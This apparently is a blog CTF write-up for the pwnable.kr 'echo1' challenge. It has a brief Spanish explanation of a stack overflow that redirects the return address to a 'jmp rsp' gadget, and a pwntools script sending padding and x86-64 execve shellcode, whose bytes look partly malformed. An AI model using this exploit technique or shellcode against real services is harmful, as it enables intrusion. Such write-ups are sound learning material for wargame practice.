History view
Writeup - pwnable.kr
Sabiendo que tenemos un overflow y la dirección de retorno en el stack, podríamos escribe en el bufferjmp rsp. Segundo aprovecharemos el overflow para escribir en la dirección de retorno justo la dirección del bufferjmp rspy seguidamente el shellcode. PWNED.
Exploit
from pwn import * import time context.log_level = 'debug' p = remote ( "pwnable.kr" , 9010 ) #p = process ('./echo1') # gdb.attach (p, '' ' #break * 0x0000000000400818 #continue #' '') shellcode = "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\x48\x31\xf6\x48\x31\xd2\x0f\x05 " p. recvuntil ( "hey, what's your name?" ) p.sendline (asm ( "jmp rsp" , arch = 'amd64' , os = 'linux' )) p.recvuntil ( ">" ) p.sendline ( "1" ) sleep ( 1 ) p.sendline ( "AAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGG\xa0\x20\x60\x00\x00\x00\x00\x00"+shellcode) p.interactive ()
'Pwning in Linux' 카테고리의 다른 글
| Armoury - Pragyan CTF 19 (2) | 2019.03.10 |
|---|---|
| Secret Keeper - Pragyan CTF 19 (0) | 2019.03.09 |
| Exploit - Two targets pwnable.xyz (0) | 2019.03.01 |
| Exploit - Note pwnable.xyz (0) | 2019.03.01 |
| Exploit - Misalignment pwnable.xyz (0) | 2019.03.01 |
Comments
Notice
Recent Posts
Recent Comments
- Total
- Today
- Yesterday
Link
TAG
- one gadget
- buffer overflow
- use after free
- open-redirect
- html injection
- ASM
- return oriented programming
- Call oriented programming
- GOT Dereferencing/Overwriting
- leak stack memory address
- Windows
- 32Bit
- dnspy
- pwnable.xyz
- stack pivot
- cracking
- Backdoors
- x64dbg
- write primitive
- hijacking redirection flow
- shellcode
- Pwnable.kr
- arithmetic overflow/underflow
- leak libc
- format string
- pwnable.tw
- theFaunia course
- XSS
- fake stack frame
- canary
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 |
Archives